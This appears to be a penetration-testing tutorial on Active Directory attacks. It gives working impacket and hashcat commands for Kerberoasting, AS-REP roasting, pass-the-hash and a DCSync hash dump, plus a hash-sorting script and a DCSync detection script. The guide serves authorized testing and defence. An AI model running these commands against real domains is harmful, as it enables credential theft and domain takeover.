Most internal penetration tests end up targeting Active Directory: once a single domain account is in hand, the attacks below are how it is turned into domain-wide control. This guide covers the essential ones, with the impacket command lines used to run them.

Kerberos Attacks

Kerberoasting

Any authenticated domain user can request a service ticket (TGS) for any Service Principal Name (SPN). Part of that ticket is encrypted with a key derived from the service account's password, so tickets for SPNs registered to user accounts can be taken offline and cracked. SPNs on machine accounts are not worth requesting, since machine passwords are long and random.

# Enumerate SPNs bound to user accounts and request a TGS for each
impacket-GetUserSPNs corp.local/user:pass -dc-ip 10.10.10.1 -request -outputfile hashes.txt

# Crack offline; 13100 is TGS-REP etype 23 (RC4). AES tickets (etype 17/18) need -m 19600 / 19700 instead
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

AS-REP Roasting

Targets accounts with the "Do not require Kerberos preauthentication" flag set. For such an account the KDC answers an AS-REQ without any proof of the password, and the AS-REP carries data encrypted with the user's key that can be cracked offline. Only a list of candidate usernames is needed; no domain credentials are required.

# Try each username without credentials; accounts lacking pre-auth return crackable AS-REP material
impacket-GetNPUsers corp.local/ -dc-ip 10.10.10.1 -no-pass -usersfile users.txt -format hashcat -outputfile asrep.txt
# Crack offline; 18200 is AS-REP etype 23 (RC4)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
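Both roasting steps produce hashcat-format lines whose etype field decides which mode can crack them, and a file that mixes RC4 and AES tickets fed to a single mode silently skips the lines it cannot parse. The Python below, added here as an example and not part of impacket or hashcat, parses the lines GetUserSPNs.py and GetNPUsers.py write, recovers account, realm and SPN, and buckets them by hashcat mode. The sample lines and the roast_<mode>.txt file names are constructed for illustration.

```python
"""Sort Kerberoast and AS-REP roast output into the hashcat modes that crack them.

Added example for this guide, not impacket or hashcat code. impacket writes one
hashcat-format line per ticket; the etype in that line fixes the hashcat mode,
and a mixed RC4/AES file fed to a single mode silently skips what it cannot parse.
Sample lines below are constructed (realistic layout, filler hex).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# (ticket kind, Kerberos etype) -> hashcat mode
HASHCAT_MODES = {
    ("tgs", 23): 13100,    # TGS-REP, RC4-HMAC: classic Kerberoast
    ("tgs", 17): 19600,    # TGS-REP, AES128-CTS-HMAC-SHA1-96
    ("tgs", 18): 19700,    # TGS-REP, AES256-CTS-HMAC-SHA1-96
    ("asrep", 23): 18200,  # AS-REP, RC4-HMAC: classic AS-REP roast
    ("asrep", 17): 32100,  # AS-REP, AES128 (hashcat 6.2.6 or newer)
    ("asrep", 18): 32200,  # AS-REP, AES256 (hashcat 6.2.6 or newer)
}

# Line layouts as impacket writes them. RC4 lines put the 16-byte checksum
# (32 hex chars) before the ciphertext; AES lines put the 12-byte HMAC tail
# (24 hex chars) there instead. Groups: etype, account, realm, [spn,] checksum, edata.
PATTERNS = [
    ("tgs", re.compile(r"^\$krb5tgs\$(23)\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-f]{32})\$([0-9a-f]+)$")),
    ("tgs", re.compile(r"^\$krb5tgs\$(1[78])\$([^$]+)\$([^$]+)\$\*([^*]+)\*\$([0-9a-f]{24})\$([0-9a-f]+)$")),
    ("asrep", re.compile(r"^\$krb5asrep\$(23)\$([^@$]+)@([^:$]+):([0-9a-f]{32})\$([0-9a-f]+)$")),
    ("asrep", re.compile(r"^\$krb5asrep\$(1[78])\$([^$]+)\$([^$]+)\$([0-9a-f]{24})\$([0-9a-f]+)$")),
]


@dataclass
class RoastHash:
    kind: str             # "tgs" (Kerberoast) or "asrep" (AS-REP roast)
    etype: int
    account: str
    realm: str
    spn: Optional[str]    # TGS tickets only; impacket replaces ':' with '~'
    checksum: str
    edata: str

    @property
    def mode(self) -> int:
        return HASHCAT_MODES[(self.kind, self.etype)]

    @property
    def rc4(self) -> bool:
        # RC4 tickets are keyed straight from the NT hash (no PBKDF2): fastest to crack.
        return self.etype == 23


def parse_roast_line(line: str) -> Optional[RoastHash]:
    """Parse one impacket hashcat-format line; return None for anything else."""
    line = line.strip()
    for kind, pattern in PATTERNS:
        m = pattern.match(line)
        if not m:
            continue
        if kind == "tgs":
            etype, account, realm, spn, checksum, edata = m.groups()
        else:
            etype, account, realm, checksum, edata = m.groups()
            spn = None
        return RoastHash(kind, int(etype), account, realm, spn, checksum, edata)
    return None


def group_by_mode(lines: List[str]) -> Dict[int, List[str]]:
    """Bucket lines by the hashcat mode that cracks them; unparsable lines are dropped."""
    buckets: Dict[int, List[str]] = {}
    for line in lines:
        parsed = parse_roast_line(line)
        if parsed is not None:
            buckets.setdefault(parsed.mode, []).append(line.strip())
    return buckets


def hashcat_commands(lines: List[str], wordlist: str = "/usr/share/wordlists/rockyou.txt") -> List[str]:
    """One hashcat command per mode; roast_<mode>.txt is a hypothetical per-mode output file."""
    return [f"hashcat -m {mode} roast_{mode}.txt {wordlist}" for mode in sorted(group_by_mode(lines))]


# Constructed sample output: two Kerberoast tickets (RC4 and AES256) and two
# AS-REP roast results (RC4 and AES128). Hex fields are filler, not captures.
SAMPLE_LINES = [
    "$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local~1433*$" + "0a" * 16 + "$" + "1b" * 64,
    "$krb5tgs$18$svc_backup$CORP.LOCAL$*backup/files01.corp.local*$" + "2c" * 12 + "$" + "3d" * 64,
    "$krb5asrep$23$jdoe@CORP.LOCAL:" + "4e" * 16 + "$" + "5f" * 64,
    "$krb5asrep$17$svc_legacy$CORP.LOCAL$" + "6a" * 12 + "$" + "7b" * 64,
]

if __name__ == "__main__":
    for raw in SAMPLE_LINES:
        h = parse_roast_line(raw)
        print(f"{h.kind:5} etype={h.etype} mode={h.mode} {h.account}@{h.realm} {h.spn or ''}")
    print("\n".join(hashcat_commands(SAMPLE_LINES)))
```

Run it over hashes.txt and asrep.txt before cracking. An etype 23 line means the account still negotiates RC4, which is what makes roasting cheap; a target that only ever yields etype 17 or 18 is AES-only, and cracking it is orders of magnitude slower because each guess costs a PBKDF2 derivation instead of a single MD4.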

Lateral Movement and Privilege Escalation in Active Directory

Pass-the-Hash

NTLM authentication uses the NT hash directly, so a hash recovered from one host (LSASS, the SAM, or a DCSync) is as good as the password anywhere the account is a local administrator. psexec uploads a service binary to ADMIN$ and starts it, which is reliable but noisy; impacket-wmiexec takes the same -hashes argument and does not create a service.

# Authenticate with the NT hash instead of the plaintext. Format is LMHASH:NTHASH; the LM half may be left empty.
# With no domain prefix this is the target's local Administrator; use corp.local/Administrator for a domain account.
impacket-psexec -hashes :NTLM_HASH Administrator@10.10.10.2

DCSync — Dump All Hashes

# Requires the Replicating Directory Changes and Replicating Directory Changes All rights on the domain object
# (Domain Admins, Enterprise Admins and DC computer accounts hold them by default)
impacket-secretsdump corp.local/admin:pass@dc.corp.local -just-dc
# NT hashes only, for a single account (the krbtgt key is the usual target)
impacket-secretsdump corp.local/admin:pass@dc.corp.local -just-dc-ntlm -just-dc-user krbtgt
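The command above leaves a recognisable trace on the domain controller: each replication request is a directory service access check, logged as Security event 4662 with the replication rights' GUIDs in the Properties field, provided Audit Directory Service Access is enabled. The Python below, added here as a detection-side example and not a vendor rule, flags such events when the requesting principal is not a known DC; the events, host names and account names are constructed.

```python
"""Flag DCSync activity in Windows Security event 4662 records.

Added example for this guide; not a vendor or Sigma rule, though it follows
the same logic. A DCSync is a replication request made with the
DS-Replication-Get-Changes extended rights. With directory service access
auditing on, the DC logs the access check as event 4662 and lists the rights'
GUIDs in Properties. Real DC-to-DC replication produces the same event from
DC computer accounts, so only principals outside a known-DC list (and an
allowlist for legitimate sync identities) are reported.
The events below are constructed, minimal 4662 renderings.
"""
import re
from typing import Dict, Iterable, List, Set

# Extended-right GUIDs used by DCSync (control access rights on the domain object).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")

Event = Dict[str, object]


def replication_rights(event: Event) -> Set[str]:
    """Names of the replication rights listed in a 4662 Properties field (empty if none)."""
    props = str(event.get("Properties", ""))
    return {REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(props) if g.lower() in REPLICATION_RIGHTS}


def detect_dcsync(events: Iterable[Event], dc_accounts: Set[str], allowlist: Iterable[str] = ()) -> List[Event]:
    """Return one alert per 4662 event that exercises replication rights from a non-DC principal.

    dc_accounts: SAM names of domain controller computer accounts, e.g. {"DC01$"}.
    An explicit DC list is used rather than a trailing '$' test: an attacker holding
    a machine account that was granted replication rights would otherwise be filtered out.
    """
    alerts: List[Event] = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev)
        if not rights:
            continue
        user = str(ev.get("SubjectUserName", ""))
        if user in dc_accounts or user in allowlist:
            continue
        alerts.append({
            "subject": f"{ev.get('SubjectDomainName', '')}\\{user}",
            "rights": sorted(rights),
            # Get-Changes-All is the right that returns secrets (NT hashes, Kerberos keys);
            # Get-Changes alone replicates non-secret attributes.
            "severity": "high" if "DS-Replication-Get-Changes-All" in rights else "medium",
        })
    return alerts


# Constructed events. A real 4662 Properties field also carries %%-coded access
# names and the object's class GUID; only the right GUIDs matter here.
# AccessMask 0x100 is Control Access, 0x10 is Read Property.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "CORP",
     "ObjectType": "{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "admin", "SubjectDomainName": "CORP",
     "ObjectType": "{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "ObjectType": "{bf967aba-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x10",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "SubjectUserName": "admin", "SubjectDomainName": "CORP"},
]

if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS, dc_accounts={"DC01$", "DC02$"}):
        print(alert)
```

Feed it events exported from the Security log of each DC. Normal DC-to-DC replication is the expected source of these events, which is why the DC list is an explicit input; legitimate synchronisation identities such as Azure AD Connect's MSOL_ account belong in the allowlist rather than being hard-coded away.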

Warning: Use these tools in authorized test environments only.